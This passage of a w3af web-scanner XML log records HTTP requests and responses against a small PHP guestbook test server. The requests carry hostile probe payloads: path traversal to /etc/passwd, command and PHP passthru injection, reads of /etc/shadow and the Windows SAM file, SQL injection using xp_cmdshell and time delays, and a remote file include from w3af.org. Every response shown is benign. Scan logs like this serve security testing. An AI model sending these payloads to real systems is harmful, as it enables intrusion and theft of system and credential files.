&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="37">
                <httprequest>
                    <status>PUT http://10.12.68.43:31337/QRMgi HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">qUjszU</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="604">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="43">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=OCTnQhQ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="58">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="62">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=.%2F..%2F..%2F..%2Fetc%2Fmotd%00html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="64">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=id&amp;uname%2B-a= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="66">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=%3C%3F%2Bpassthru%28%22id%22%29&amp;%3F%3E= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="67">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=..%2F..%2FWINNT%2Fsystem32%2Fcmd.exe%3Fdir%2Bc%3A%5C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="72">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=type%2Bc%3A%5Cwinnt%5Crepair%5Csam._ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="75">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=ps%2B-aux HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="77">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=..%2F..%2F..%2F..%2Fbin%2Fchgrp%2Bnobody%2B%2Fetc%2Fshadow%7C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="78">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=SELECT%2BTOP%2B1%2Bname%2BFROM%2Bsysusers HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="79">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=exec%2Bmaster..xp_cmdshell%2Bdir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="81">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?sNHf8tg=exec%2Bxp_cmdshell%2Bdir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="92">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="94">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="97">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="98">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="99">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/TwgVH.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/TwgVH.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="102">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="103">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="549">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="622">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="122">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
